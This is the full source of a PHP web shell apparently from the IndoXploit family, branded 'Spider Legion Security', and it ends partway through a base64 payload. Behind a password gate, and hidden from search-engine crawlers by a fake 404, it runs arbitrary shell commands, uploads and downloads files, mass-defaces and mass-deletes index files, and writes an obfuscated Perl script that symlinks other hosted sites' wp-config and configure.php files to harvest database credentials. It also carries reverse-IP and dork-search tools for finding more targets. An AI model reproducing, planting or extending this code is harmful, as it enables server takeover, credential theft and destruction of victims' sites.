<?phpsession_start();error_reporting(0);set_time_limit(0);@set_magic_quo

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12.  
13. $auth_pass = "77539a26fb5c4d0af80d43a295bb6053";
14. $color = "red";
15. $default_action = 'FilesMan';
16. $default_use_ajax = true;
17. $default_charset = 'UTF-8';
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21. header('HTTP/1.0 404 Not Found');
22. exit;
23. }
24. }
25.  
26. function login_shell() {
27. ?>
28. <html>
29. <head>
30. <title>Spider Legion Security</title>
31. <link rel="SHORTCUT ICON" href="http://oi66.tinypic.com/28a25hg.jpg">
32. <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
33. <style type="text/css">
34. html {
35. margin: 20px auto;
36. background: #737D7F;
37. color: #3BFF14;
38. text-align: center;
39. }
40. header {
41. color: green;
42. margin: 10px auto;
43. }
44. input[type=password] {
45. width: 250px;
46. height: 25px;
47. color: white;
48. background: #737D7F;
49. border:hidden;
50. padding: 5px;
51. margin-left: 20px;
52. text-align: center;
53. }
54. .typed-cursor{
55. opacity: 1;
56. font-weight: 100;
57. -webkit-animation: blink 0.7s infinite;
58. -moz-animation: blink 0.7s infinite;
59. -ms-animation: blink 0.7s infinite;
60. -o-animation: blink 0.7s infinite;
61. animation: blink 0.7s infinite;
62. }
63. @-keyframes blink{
64. 0% { opacity:1; }
65. 50% { opacity:0; }
66. 100% { opacity:1; }
67. }
68. @-webkit-keyframes blink{
69. 0% { opacity:1; }
70. 50% { opacity:0; }
71. 100% { opacity:1; }
72. }
73. @-moz-keyframes blink{
74. 0% { opacity:1; }
75. 50% { opacity:0; }
76. 100% { opacity:1; }
77. }
78. @-ms-keyframes blink{
79. 0% { opacity:1; }
80. 50% { opacity:0; }
81. 100% { opacity:1; }
82. }
83. @-o-keyframes blink{
84. 0% { opacity:1; }
85. 50% { opacity:0; }
86. 100% { opacity:1; }
87. }
88.  
89. .typed-fade-out{
90. opacity: 0;
91. animation: 0;
92. transition: opacity .25s;
93. }
94. h1{
95. color:#fff;
96. }
97. h2{
98. color:red;
99. }
100. span{
101. color: #03FF30;
102. font-family: System, Geneva, sans-serif;
103. }
104. </style>
105. </head>
106. <center>
107. <header>
108. <center>
109. <form method="post">
110. <input type="password" name="pass">
111. </form>
112. </center>
113. <center><img src="http://oi66.tinypic.com/28a25hg.jpg" width="200" height="200"></center>
114. <br>
115. <div class="wrap">
116. <h1 class="h1">Spider Legion Security</h1><br>
117. <font color="#26FF3E">[!] We Are Legion [!]<br>[!] We Are Anonymous INDONESIA [!]<br><br></font>
118. <font color="#FFFFFF">YOUR SYSTEM NOT SAFE!</font>
119. </header>
120. <?php
121. exit;
122. }
123. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
124. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
125. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
126. else
127. login_shell();
128. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
129. @ob_clean();
130. $file = $_GET['file'];
131. header('Content-Description: File Transfer');
132. header('Content-Type: application/octet-stream');
133. header('Content-Disposition: attachment; filename="'.basename($file).'"');
134. header('Expires: 0');
135. header('Cache-Control: must-revalidate');
136. header('Pragma: public');
137. header('Content-Length: ' . filesize($file));
138. readfile($file);
139. exit;
140. }
141. ?>
142. <title>Spider Legion Security Shell | Designed By: Mr.Lt_f1</title>
143. <meta name='author' content='Spider Legion Security'>
144. <link rel="SHORTCUT ICON" href="http://oi66.tinypic.com/28a25hg.jpg">
145. <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
146. <meta charset="UTF-8">
147. <style type='text/css'>
148. @import url(https://fonts.googleapis.com/css?family=System, Geneva, sans-serif);
149. html {
150. background: #000000;
151. color: #ffffff;
152. font-family: 'System, Geneva, sans-serif';
153. font-size: 15px;
154. width: 100%;
155. }
156. hr{
157. color: red;
158. }
159. li {
160. display: inline;
161. margin: 5px;
162. padding: 5px;
163. }
164. table, th, td {
165. border-collapse:collapse;
166. font-family: System, Geneva, sans-serif;
167. background: transparent;
168. font-family: 'System, Geneva, sans-serif';
169. font-size: 15px;
170. }
171. .table_home, .th_home, .td_home {
172. border: 1px solid red;
173. }
174. th {
175. padding: 10px;
176. }
177. a {
178. color: #ffffff;
179. text-decoration: none;
180. }
181. a:hover {
182. text-decoration: underline;
183. }
184. b {
185. color: gold;
186. }
187. input[type=text], input[type=password],input[type=submit] {
188. background: transparent;
189. color: white;
190. border: 1px solid red;
191. margin: 5px auto;
192. padding-left: 5px;
193. font-family: 'System, Geneva, sans-serif';
194. font-size: 15px;
195. }
196. textarea {
197. border: 1px solid red;
198. width: 100%;
199. height: 400px;
200. padding-left: 5px;
201. margin: 10px auto;
202. resize: none;
203. background: transparent;
204. color: #ffffff;
205. font-family: 'System, Geneva, sans-serif';
206. font-size: 15px;
207. }
208. select {
209. width: 152px;
210. background: #000000;
211. color: red;
212. border: 1px solid #ffffff;
213. margin: 5px auto;
214. padding-left: 5px;
215. font-family: 'System, Geneva, sans-serif';
216. font-size: 15px;
217. }
218. option:hover {
219. background: black;
220. color: #000000;
221. }
222. </style>
223. </head>
224. <?php
225. function w($dir,$perm) {
226. if(!is_writable($dir)) {
227. return "<font color=red>".$perm."</font>";
228. } else {
229. return "<font color=white>".$perm."</font>";
230. }
231. }
232. function r($dir,$perm) {
233. if(!is_readable($dir)) {
234. return "<font color=red>".$perm."</font>";
235. } else {
236. return "<font color=blue>".$perm."</font>";
237. }
238. }
239. function exe($cmd) {
240. if(function_exists('system')) {
241. @ob_start();
242. @system($cmd);
243. $buff = @ob_get_contents();
244. @ob_end_clean();
245. return $buff;
246. } elseif(function_exists('exec')) {
247. @exec($cmd,$results);
248. $buff = "";
249. foreach($results as $result) {
250. $buff .= $result;
251. } return $buff;
252. } elseif(function_exists('passthru')) {
253. @ob_start();
254. @passthru($cmd);
255. $buff = @ob_get_contents();
256. @ob_end_clean();
257. return $buff;
258. } elseif(function_exists('shell_exec')) {
259. $buff = @shell_exec($cmd);
260. return $buff;
261. }
262. }
263. function perms($file){
264. $perms = fileperms($file);
265. if (($perms & 0xC000) == 0xC000) {
266. // Socket
267. $info = 's';
268. } elseif (($perms & 0xA000) == 0xA000) {
269. // Symbolic Link
270. $info = 'l';
271. } elseif (($perms & 0x8000) == 0x8000) {
272. // Regular
273. $info = '-';
274. } elseif (($perms & 0x6000) == 0x6000) {
275. // Block special
276. $info = 'b';
277. } elseif (($perms & 0x4000) == 0x4000) {
278. // Directory
279. $info = 'd';
280. } elseif (($perms & 0x2000) == 0x2000) {
281. // Character special
282. $info = 'c';
283. } elseif (($perms & 0x1000) == 0x1000) {
284. // FIFO pipe
285. $info = 'p';
286. } else {
287. // Unknown
288. $info = 'u';
289. }
290. // Owner
291. $info .= (($perms & 0x0100) ? 'r' : '-');
292. $info .= (($perms & 0x0080) ? 'w' : '-');
293. $info .= (($perms & 0x0040) ?
294. (($perms & 0x0800) ? 's' : 'x' ) :
295. (($perms & 0x0800) ? 'S' : '-'));
296. // Group
297. $info .= (($perms & 0x0020) ? 'r' : '-');
298. $info .= (($perms & 0x0010) ? 'w' : '-');
299. $info .= (($perms & 0x0008) ?
300. (($perms & 0x0400) ? 's' : 'x' ) :
301. (($perms & 0x0400) ? 'S' : '-'));
302. // World
303. $info .= (($perms & 0x0004) ? 'r' : '-');
304. $info .= (($perms & 0x0002) ? 'w' : '-');
305. $info .= (($perms & 0x0001) ?
306. (($perms & 0x0200) ? 't' : 'x' ) :
307. (($perms & 0x0200) ? 'T' : '-'));
308. return $info;
309. }
310. function hdd($s) {
311. if($s >= 1073741824)
312. return sprintf('%1.2f',$s / 1073741824 ).' GB';
313. elseif($s >= 1048576)
314. return sprintf('%1.2f',$s / 1048576 ) .' MB';
315. elseif($s >= 1024)
316. return sprintf('%1.2f',$s / 1024 ) .' KB';
317. else
318. return $s .' B';
319. }
320. function ambilKata($param, $kata1, $kata2){
321. if(strpos($param, $kata1) === FALSE) return FALSE;
322. if(strpos($param, $kata2) === FALSE) return FALSE;
323. $start = strpos($param, $kata1) + strlen($kata1);
324. $end = strpos($param, $kata2, $start);
325. $return = substr($param, $start, $end - $start);
326. return $return;
327. }
328. function getsource($url) {
329. $curl = curl_init($url);
330. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
331. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
332. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
333. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
334. $content = curl_exec($curl);
335. curl_close($curl);
336. return $content;
337. }
338. function bing($dork) {
339. $npage = 1;
340. $npages = 30000;
341. $allLinks = array();
342. $lll = array();
343. while($npage <= $npages) {
344. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
345. if($x) {
346. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
347. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
348. $npage = $npage + 10;
349. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
350. } else break;
351. }
352. $URLs = array();
353. foreach($allLinks as $url){
354. $exp = explode("/", $url);
355. $URLs[] = $exp[2];
356. }
357. $array = array_filter($URLs);
358. $array = array_unique($array);
359. $sss = count(array_unique($array));
360. foreach($array as $domain) {
361. echo $domain."\n";
362. }
363. }
364. function reverse($url) {
365. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
366. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
367. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
368. curl_setopt($ch, CURLOPT_HEADER, 0);
369. curl_setopt($ch, CURLOPT_POST, 1);
370. $resp = curl_exec($ch);
371. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
372. $array = explode(",,", $resp);
373. unset($array[0]);
374. foreach($array as $lnk) {
375. $lnk = "http://$lnk";
376. $lnk = str_replace(",", "", $lnk);
377. echo $lnk."\n";
378. ob_flush();
379. flush();
380. }
381. curl_close($ch);
382. }
383. if(get_magic_quotes_gpc()) {
384. function idx_ss($array) {
385. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
386. }
387. $_POST = idx_ss($_POST);
388. $_COOKIE = idx_ss($_COOKIE);
389. }
390.  
391. if(isset($_GET['dir'])) {
392. $dir = $_GET['dir'];
393. chdir($dir);
394. } else {
395. $dir = getcwd();
396. }
397. $kernel = php_uname();
398. $ip = gethostbyname($_SERVER['HTTP_HOST']);
399. $dir = str_replace("\\","/",$dir);
400. $scdir = explode("/", $dir);
401. $freespace = hdd(disk_free_space("/"));
402. $total = hdd(disk_total_space("/"));
403. $used = $total - $freespace;
404. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
405. $ds = @ini_get("disable_functions");
406. $mysql = (function_exists('mysql_connect')) ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
407. $curl = (function_exists('curl_version')) ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
408. $wget = (exe('wget --help')) ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
409. $perl = (exe('perl --help')) ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
410. $python = (exe('python --help')) ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
411. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=red>NONE</font>";
412. if(!function_exists('posix_getegid')) {
413. $user = @get_current_user();
414. $uid = @getmyuid();
415. $gid = @getmygid();
416. $group = "?";
417. } else {
418. $uid = @posix_getpwuid(posix_geteuid());
419. $gid = @posix_getgrgid(posix_getegid());
420. $user = $uid['name'];
421. $uid = $uid['uid'];
422. $group = $gid['name'];
423. $gid = $gid['gid'];
424. }
425. echo "<hr>";
426. echo "<center>";
427. echo "<ul>";
428. echo "<li>:: <a href='?'>LOKASI SHELL</a> ::</li>";
429. echo "<li>:: <a href='?dir=$dir&do=cmd'>COMMAND</a> ::</li>";
430. echo "<li>:: <a href='?dir=$dir&do=upload'>UPLOAD FILE</a> ::</li>";
431. echo "<li>:: <a href='?dir=$dir&do=config'>CONFIG</a> ::</li>";
432. echo "<li>:: <a href='?dir=$dir&do=jumping'>JUMPING</a> ::</li>";
433. echo "<li>:: <a style='color: red;' href='?logout=true'>KELUAR</a> ::</li>";
434. echo "</ul>";
435. echo "<hr>";
436. echo "</center>";
437. echo "<br>";
438. echo "DIREKTORI : ";
439. foreach($scdir as $c_dir => $cdir) {
440. echo "<a href='?dir=";
441. for($i = 0; $i <= $c_dir; $i++) {
442. echo $scdir[$i];
443. if($i != $c_dir) {
444. echo "/";
445. }
446. }
447. echo "'>$cdir</a>/";
448. }
449. if($_GET['logout'] == true) {
450. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
451. echo "<script>window.location='?';</script>";
452. } elseif($_GET['do'] == 'upload') {
453. echo "<center>";
454. if($_POST['upload']) {
455. if($_POST['tipe_upload'] == 'biasa') {
456. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
457. $act = "<font color=red>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
458. } else {
459. $act = "<font color=red>failed to upload file</font>";
460. }
461. } else {
462. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
463. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
464. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
465. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
466. $act = "<font color=red>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
467. } else {
468. $act = "<font color=red>failed to upload file</font>";
469. }
470. } else {
471. $act = "<font color=red>failed to upload file</font>";
472. }
473. }
474. }
475. echo "Upload File:
476. <form method='post' enctype='multipart/form-data'>
477. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
478. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br> <input type='file' name='ix_file'>
479. <input type='submit' value='upload' name='upload'>
480. </form>";
481. echo $act;
482. echo "</center>";
483. } elseif($_GET['do'] == 'cmd') {
484. echo "<form method='post'>
485. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
486. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
487. </form>";
488. if($_POST['do_cmd']) {
489. echo "<pre>".exe($_POST['cmd'])."</pre>";
490. }
491. } elseif($_GET['do'] == 'mass_deface') {
492. function sabun_massal($dir,$namafile,$isi_script) {
493. if(is_writable($dir)) {
494. $dira = scandir($dir);
495. foreach($dira as $dirb) {
496. $dirc = "$dir/$dirb";
497. $lokasi = $dirc.'/'.$namafile;
498. if($dirb === '.') {
499. file_put_contents($lokasi, $isi_script);
500. } elseif($dirb === '..') {
501. file_put_contents($lokasi, $isi_script);
502. } else {
503. if(is_dir($dirc)) {
504. if(is_writable($dirc)) {
505. echo "[<font color=red>DONE</font>] $lokasi<br>";
506. file_put_contents($lokasi, $isi_script);
507. $idx = sabun_massal($dirc,$namafile,$isi_script);
508. }
509. }
510. }
511. }
512. }
513. }
514. function sabun_biasa($dir,$namafile,$isi_script) {
515. if(is_writable($dir)) {
516. $dira = scandir($dir);
517. foreach($dira as $dirb) {
518. $dirc = "$dir/$dirb";
519. $lokasi = $dirc.'/'.$namafile;
520. if($dirb === '.') {
521. file_put_contents($lokasi, $isi_script);
522. } elseif($dirb === '..') {
523. file_put_contents($lokasi, $isi_script);
524. } else {
525. if(is_dir($dirc)) {
526. if(is_writable($dirc)) {
527. echo "[<font color=red>DONE</font>] $dirb/$namafile<br>";
528. file_put_contents($lokasi, $isi_script);
529. }
530. }
531. }
532. }
533. }
534. }
535. if($_POST['start']) {
536. if($_POST['tipe_sabun'] == 'mahal') {
537. echo "<div style='margin: 5px auto; padding: 5px'>";
538. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
539. echo "</div>";
540. } elseif($_POST['tipe_sabun'] == 'murah') {
541. echo "<div style='margin: 5px auto; padding: 5px'>";
542. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
543. echo "</div>";
544. }
545. } else {
546. echo "<center>";
547. echo "<form method='post'>
548. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
549. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
550. <font style='text-decoration: underline;'>Folder:</font><br>
551. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
552. <font style='text-decoration: underline;'>Filename:</font><br>
553. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
554. <font style='text-decoration: underline;'>Index File:</font><br>
555. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
556. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
557. </form></center>";
558. }
559. } elseif($_GET['do'] == 'mass_delete') {
560. function hapus_massal($dir,$namafile) {
561. if(is_writable($dir)) {
562. $dira = scandir($dir);
563. foreach($dira as $dirb) {
564. $dirc = "$dir/$dirb";
565. $lokasi = $dirc.'/'.$namafile;
566. if($dirb === '.') {
567. if(file_exists("$dir/$namafile")) {
568. unlink("$dir/$namafile");
569. }
570. } elseif($dirb === '..') {
571. if(file_exists("".dirname($dir)."/$namafile")) {
572. unlink("".dirname($dir)."/$namafile");
573. }
574. } else {
575. if(is_dir($dirc)) {
576. if(is_writable($dirc)) {
577. if(file_exists($lokasi)) {
578. echo "[<font color=red>DELETED</font>] $lokasi<br>";
579. unlink($lokasi);
580. $idx = hapus_massal($dirc,$namafile);
581. }
582. }
583. }
584. }
585. }
586. }
587. }
588. if($_POST['start']) {
589. echo "<div style='margin: 5px auto; padding: 5px'>";
590. hapus_massal($_POST['d_dir'], $_POST['d_file']);
591. echo "</div>";
592. } else {
593. echo "<center>";
594. echo "<form method='post'>
595. <font style='text-decoration: underline;'>Folder:</font><br>
596. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
597. <font style='text-decoration: underline;'>Filename:</font><br>
598. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
599. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
600. </form></center>";
601. }
602. } elseif($_GET['do'] == 'config') {
603. $idx = mkdir("idx_config", 0777);
604. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
605. $htc = fopen("idx_config/.htaccess","w");
606. fwrite($htc, $isi_htc);
607. fclose($htc);
608. if(preg_match("/vhosts|vhost/", $dir)) {
609. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
610. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2